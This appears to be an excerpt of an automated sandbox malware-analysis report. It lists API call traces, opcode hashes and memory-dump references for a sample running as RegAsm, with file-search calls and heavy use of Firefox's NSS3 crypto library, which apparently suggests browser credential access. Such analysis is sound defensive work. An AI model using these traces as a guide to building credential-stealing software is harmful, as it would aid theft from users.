Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB4), ref: 00416050
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436AB8), ref: 0041606A
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 00416091
Part of subcall function 00415FD1: StrCmpCA.SHLWAPI(?,00436647), ref: 004160A5
Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160C2
Part of subcall function 00415FD1: PathMatchSpecA.SHLWAPI(?,?), ref: 004160EF
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?), ref: 00416125
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD0), ref: 00416137
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 0041614A
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,00436AD4), ref: 0041615C
Part of subcall function 00415FD1: lstrcatA.KERNEL32(?,?), ref: 00416170

Part of subcall function 00415FD1: wsprintfA.USER32 ref: 004160D9
Part of subcall function 00415FD1: FindNextFileA.KERNEL32(?,?), ref: 004162FF
Part of subcall function 00415FD1: FindClose.KERNEL32(?), ref: 00416313

Memory Dump Source

Source File: 00000006.00000002.2048308156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2048308156.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000006.00000002.2048308156.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$wsprintf$Find$FilePath$CloseFirstFolderMatchNextSpec
String ID:
API String ID: 153043497-0
Opcode ID: c4f50c1d24547cc29a72e15d362f30183b109c2c9d9d5fb6f85994bd63f68b1a
Instruction ID: cfafa51994c6dd41316c3016dfe646ce489cf68115bfde9b3865c7b361435df3
Opcode Fuzzy Hash: c4f50c1d24547cc29a72e15d362f30183b109c2c9d9d5fb6f85994bd63f68b1a
Instruction Fuzzy Hash: FF21B57190021DAFCF54DF60DC46AD9B779EB08305F1040A6F549A3190EEBA9BC48F44

Function 6CAA2DF0 Relevance: 6.1, APIs: 4, Instructions: 72memoryCOMMON

Download Yara Rule

APIs

PORT_ArenaMark_Util.NSS3(?), ref: 6CAA2E08

Part of subcall function 6CA914C0: TlsGetValue.KERNEL32 ref: 6CA914E0
Part of subcall function 6CA914C0: EnterCriticalSection.KERNEL32 ref: 6CA914F5
Part of subcall function 6CA914C0: PR_Unlock.NSS3 ref: 6CA9150D

PORT_NewArena_Util.NSS3(00000400), ref: 6CAA2E1C
PORT_ArenaAlloc_Util.NSS3(00000000,00000064), ref: 6CAA2E3B
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CAA2E95

Part of subcall function 6CA91200: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6CA388A4,00000000,00000000), ref: 6CA91228
Part of subcall function 6CA91200: EnterCriticalSection.KERNEL32(B8AC9BDF), ref: 6CA91238
Part of subcall function 6CA91200: PL_ClearArenaPool.NSS3(00000000,00000000,00000000,00000000,00000000,?,6CA388A4,00000000,00000000), ref: 6CA9124B
Part of subcall function 6CA91200: PR_CallOnce.NSS3(6CB92AA4,6CA912D0,00000000,00000000,00000000,?,6CA388A4,00000000,00000000), ref: 6CA9125D
Part of subcall function 6CA91200: PL_FreeArenaPool.NSS3(00000000,00000000,00000000), ref: 6CA9126F
Part of subcall function 6CA91200: free.MOZGLUE(00000000,?,00000000,00000000), ref: 6CA91280
Part of subcall function 6CA91200: PR_Unlock.NSS3(00000000,?,?,00000000,00000000), ref: 6CA9128E
Part of subcall function 6CA91200: DeleteCriticalSection.KERNEL32(0000001C,?,?,?,00000000,00000000), ref: 6CA9129A
Part of subcall function 6CA91200: free.MOZGLUE(00000000,?,?,?,00000000,00000000), ref: 6CA912A1

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: ArenaUtil$CriticalSection$Arena_EnterFreePoolUnlockValuefree$Alloc_CallClearDeleteMark_Once
String ID:
API String ID: 1441289343-0
Opcode ID: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction ID: 906dd2ec69d3ac347ceacdbcc333d6d72ef47d743fff8ea7e0eb9bbebb573c9e
Opcode Fuzzy Hash: f90256335fee6aeeaa24d2f6bee3f354c0acb0369ebf8db753efb3bf32d612af
Instruction Fuzzy Hash: 512146B1E103404BEB10CF919D45BAA3BB4AFA130CF150369DD0C5B702F7B2E6E98292

Function 6CA5ACB0 Relevance: 6.1, APIs: 4, Instructions: 66COMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6CA5ACC2

Part of subcall function 6CA32F00: PORT_NewArena_Util.NSS3(00000800), ref: 6CA32F0A
Part of subcall function 6CA32F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6CA32F1D

Part of subcall function 6CA32AE0: PORT_Strdup_Util.NSS3(?,?,?,?,?,6CA30A1B,00000000), ref: 6CA32AF0
Part of subcall function 6CA32AE0: tolower.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CA32B11

CERT_DestroyCertList.NSS3(00000000), ref: 6CA5AD5E

Part of subcall function 6CA757D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6CA3B41E,00000000,00000000,?,00000000,?,6CA3B41E,00000000,00000000,00000001,?), ref: 6CA757E0
Part of subcall function 6CA757D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6CA75843

CERT_DestroyCertList.NSS3(?), ref: 6CA5AD36

Part of subcall function 6CA32F50: CERT_DestroyCertificate.NSS3(?), ref: 6CA32F65
Part of subcall function 6CA32F50: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA32F83

free.MOZGLUE(?), ref: 6CA5AD4F

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Util$CertDestroyList$Arena_free$Alloc_ArenaCertificateFreeK11_Strdup_Tokenstolower
String ID:
API String ID: 132756963-0
Opcode ID: c19caedda8e7b5cd0608ec027f6751100112bd561b694f6c1cd3751693bd1876
Instruction ID: 87e0921c4d7270c2d3ed85a8bb56c7baa69ad0a66e7e4de8aae2d1be322ad4a5
Opcode Fuzzy Hash: c19caedda8e7b5cd0608ec027f6751100112bd561b694f6c1cd3751693bd1876
Instruction Fuzzy Hash: 1F21C6B2E002148BEF10DF64D9055FEB7B5AF05208F558168D808BB601F731AEA9CBF1

Function 6CA83C80 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA83C9E
EnterCriticalSection.KERNEL32(?), ref: 6CA83CAE
PR_Unlock.NSS3(?), ref: 6CA83CEA
PR_SetError.NSS3(00000000,00000000), ref: 6CA83D02

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: a4e7b1eafde6fdf80153a54132702bdd10dec176a4e90f0c94c3574e5a094a37
Instruction ID: 9404f9be7469d5337581adddf1360ecde643e0b7df89f75162b9fd2d005cdc00
Opcode Fuzzy Hash: a4e7b1eafde6fdf80153a54132702bdd10dec176a4e90f0c94c3574e5a094a37
Instruction Fuzzy Hash: D611E975A02204AFDB00EF24DC48E9A3778EF0A368F594564ED4487712E730ED98CBE0

Function 6CA8ECB0 Relevance: 6.1, APIs: 4, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000800,?,00000001,?,6CA8F0AD,6CA8F150,?,6CA8F150,?,?,?), ref: 6CA8ECBA

Part of subcall function 6CA90FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CA387ED,00000800,6CA2EF74,00000000), ref: 6CA91000
Part of subcall function 6CA90FF0: PR_NewLock.NSS3(?,00000800,6CA2EF74,00000000), ref: 6CA91016
Part of subcall function 6CA90FF0: PL_InitArenaPool.NSS3(00000000,security,6CA387ED,00000008,?,00000800,6CA2EF74,00000000), ref: 6CA9102B

PORT_ArenaAlloc_Util.NSS3(00000000,00000028,?,?,?), ref: 6CA8ECD1

Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA910F3
Part of subcall function 6CA910C0: EnterCriticalSection.KERNEL32(?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9110C
Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91141
Part of subcall function 6CA910C0: PR_Unlock.NSS3(?,?,?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA91182
Part of subcall function 6CA910C0: TlsGetValue.KERNEL32(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6CA8ED02

Part of subcall function 6CA910C0: PL_ArenaAllocate.NSS3(?,6CA38802,00000000,00000008,?,6CA2EF74,00000000), ref: 6CA9116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6CA8ED5A

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: a61c585897f8b86c26c6c784cd6c56f7aee47fca22cf05438a7a71f8488cbc21
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 3721D4B5A017429BE700CF25D944B52B7E4BFA5348F15C215E81C8B662E770E5D8C6D0

Function 6CABEDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6CAA7FFA,?,6CAA9767,?,8B7874C0,0000A48E), ref: 6CABEDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6CAA7FFA,?,6CAA9767,?,8B7874C0,0000A48E), ref: 6CABEDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6CAA7FFA,?,6CAA9767,?,8B7874C0,0000A48E), ref: 6CABEE14

Part of subcall function 6CA90BE0: malloc.MOZGLUE(6CA88D2D,?,00000000,?), ref: 6CA90BF8
Part of subcall function 6CA90BE0: TlsGetValue.KERNEL32(6CA88D2D,?,00000000,?), ref: 6CA90C15

memcpy.VCRUNTIME140(?,?,6CAA9767,00000000,00000000,6CAA7FFA,?,6CAA9767,?,8B7874C0,0000A48E), ref: 6CABEE33

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: d8bc922f990423d41a71a456d9ce4d16fa85daf1bbab2d9f68d78815a91fe627
Instruction ID: 7f27ffda16c9ae8116d27f89b8bd2384aaa33e9d559516ff87094480ab174ff1
Opcode Fuzzy Hash: d8bc922f990423d41a71a456d9ce4d16fa85daf1bbab2d9f68d78815a91fe627
Instruction Fuzzy Hash: 3011A0B1A00706BBEB109E65DC84B06B3BCEF0435DF284571F919E2A00E330F4A487E2

Function 6CA58DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6CA58DE7
EnterCriticalSection.KERNEL32 ref: 6CA58DFC
PR_Unlock.NSS3 ref: 6CA58E2D
PR_SetError.NSS3 ref: 6CA58E49

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: a772324d78b839c591f4d9dd07ec4d72e39c6dcc56e8fa67fdf3267ccbcad269
Instruction ID: d158881dbe9e7558ba9534c62f5e85cd43ad6a49d5d7b5f26ceaa0f12c2f9ca0
Opcode Fuzzy Hash: a772324d78b839c591f4d9dd07ec4d72e39c6dcc56e8fa67fdf3267ccbcad269
Instruction Fuzzy Hash: 7D118F71A05A009BD700BF78C548669BBF4FF06714F458929DC88D7B00E730E8A4CBD1

Function 6CADAC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6CAC5F17,?,?,?,?,?,?,?,?,6CACAAD4), ref: 6CADAC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6CAC5F17,?,?,?,?,?,?,?,?,6CACAAD4), ref: 6CADACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6CACAAD4), ref: 6CADACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6CACAAD4), ref: 6CADACDB

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: 022d806deeb7ca7542423261ba2867fc38fbe66e1a643d688d22754082a4cca7
Instruction ID: 1a35487e0ff6816ccfc8e32a0dc015e6788ddf63da5a9f3bdb8e0f0a1ccb4c62
Opcode Fuzzy Hash: 022d806deeb7ca7542423261ba2867fc38fbe66e1a643d688d22754082a4cca7
Instruction Fuzzy Hash: 7D01B1B5701B019BE760DF79E908743B7E8BF00669B044839D85AC3E00E734F498CB90

Function 6CA41DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6CA41DFB

Part of subcall function 6CA395B0: TlsGetValue.KERNEL32(00000000,?,6CA500D2,00000000), ref: 6CA395D2
Part of subcall function 6CA395B0: EnterCriticalSection.KERNEL32(?,?,?,6CA500D2,00000000), ref: 6CA395E7
Part of subcall function 6CA395B0: PR_Unlock.NSS3(?,?,?,?,6CA500D2,00000000), ref: 6CA39605

PR_EnterMonitor.NSS3 ref: 6CA41E09

Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF90AB
Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF90C9
Part of subcall function 6CAF9090: EnterCriticalSection.KERNEL32 ref: 6CAF90E5
Part of subcall function 6CAF9090: TlsGetValue.KERNEL32 ref: 6CAF9116
Part of subcall function 6CAF9090: LeaveCriticalSection.KERNEL32 ref: 6CAF913F

Part of subcall function 6CA3E190: PR_EnterMonitor.NSS3(?,?,6CA3E175), ref: 6CA3E19C
Part of subcall function 6CA3E190: PR_EnterMonitor.NSS3(6CA3E175), ref: 6CA3E1AA
Part of subcall function 6CA3E190: PR_ExitMonitor.NSS3 ref: 6CA3E208
Part of subcall function 6CA3E190: PL_HashTableRemove.NSS3(?), ref: 6CA3E219
Part of subcall function 6CA3E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA3E231
Part of subcall function 6CA3E190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CA3E249
Part of subcall function 6CA3E190: PR_ExitMonitor.NSS3 ref: 6CA3E257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA41E37
PR_ExitMonitor.NSS3 ref: 6CA41E4A

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: 458a34d50acf495d14f6bc09692c5deb7f962ecd3fbb4ed4fb90d53ffe029aeb
Instruction ID: db52304029ea4fb133216155255f3eb15385f3aca1704a666ce02c03b79374ab
Opcode Fuzzy Hash: 458a34d50acf495d14f6bc09692c5deb7f962ecd3fbb4ed4fb90d53ffe029aeb
Instruction Fuzzy Hash: D401D475B4015097EB005E69ED42F727774AB46B4CF148030EA1997B51E731ECA8CBD1

Function 6CA41D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA41D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6CA41D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6CA41D9C
free.MOZGLUE(00000000), ref: 6CA41DB8

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: af2c2f2ccbad3c76e87b1b590bfb06b662ac4737d2675dc5e6b25eb0838be46c
Instruction ID: 6e84d8e5a1caef646ca9c87146ed83ecf10891177ee10871ef7b697162726419
Opcode Fuzzy Hash: af2c2f2ccbad3c76e87b1b590bfb06b662ac4737d2675dc5e6b25eb0838be46c
Instruction Fuzzy Hash: 9FF0F9F260121057FF105E59AC42B673658DF81B9CF158235DF2D87B54DB60E49482E1

Function 6CADAC00 Relevance: 6.0, APIs: 4, Instructions: 45COMMON

Download Yara Rule

APIs

PK11_FreeSymKey.NSS3(?,6CAC5D40,00000000,?,?,6CAB6AC6,6CAC639C), ref: 6CADAC2D

Part of subcall function 6CA7ADC0: TlsGetValue.KERNEL32(?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AE10
Part of subcall function 6CA7ADC0: EnterCriticalSection.KERNEL32(?,?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AE24
Part of subcall function 6CA7ADC0: PR_Unlock.NSS3(?,?,?,?,?,?,6CA5D079,00000000,00000001), ref: 6CA7AE5A
Part of subcall function 6CA7ADC0: memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AE6F
Part of subcall function 6CA7ADC0: free.MOZGLUE(85145F8B,?,?,?,?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AE7F
Part of subcall function 6CA7ADC0: TlsGetValue.KERNEL32(?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AEB1
Part of subcall function 6CA7ADC0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6CA5CDBB,?,6CA5D079,00000000,00000001), ref: 6CA7AEC9

PK11_FreeSymKey.NSS3(?,6CAC5D40,00000000,?,?,6CAB6AC6,6CAC639C), ref: 6CADAC44
SECITEM_ZfreeItem_Util.NSS3(8CB6FF15,00000000,6CAC5D40,00000000,?,?,6CAB6AC6,6CAC639C), ref: 6CADAC59
free.MOZGLUE(8CB6FF01,6CAB6AC6,6CAC639C,?,?,?,?,?,?,?,?,?,6CAC5D40,00000000,?,6CACAAD4), ref: 6CADAC62

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6c9b0000_RegAsm.jbxd

Similarity

API ID: CriticalEnterFreeK11_SectionValuefree$Item_UnlockUtilZfreememset
String ID:
API String ID: 1595327144-0
Opcode ID: 7b7954e821e290840707370ae3ea6588a2d7cceb4436acd54e72051b8c45501e
Instruction ID: 169daacd78a4035a114f79e3801853c9b6f612feae714077e4f1a517a3c647a5
Opcode Fuzzy Hash: 7b7954e821e290840707370ae3ea6588a2d7cceb4436acd54e72051b8c45501e
Instruction Fuzzy Hash: 5D018BB56016009FDB10CF54E9C0B46B7A9AF04B28F188068E8098F706D734FC88CBB1

Function 6CA8FD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6CA39003,?), ref: 6CA8FD91

Part of subcall function 6CA90BE0: malloc.MOZGLUE(6CA88D2D,?,00000000,?), ref: 6CA90BF8
Part of subcall function 6CA90BE0: TlsGetValue.KERNEL32(6CA88D2D,?,00000000,?), ref: 6CA90C15

PORT_Alloc_Util.NSS3(A4686CA9,?), ref: 6CA8FDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686CA9,?,?), ref: 6CA8FDC4
free.MOZGLUE(00000000,?,?), ref: 6CA8FDD1

Memory Dump Source

Source File: 00000006.00000002.2127485063.000000006C9B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C9B0000, based on PE: true

Associated: 00000006.00000002.2127451749.000000006C9B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2140600083.000000006CB4F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142711357.000000006CB8E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2142980138.000000006CB8F000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2143375682.000000006CB90000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2144083177.000000006CB95000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

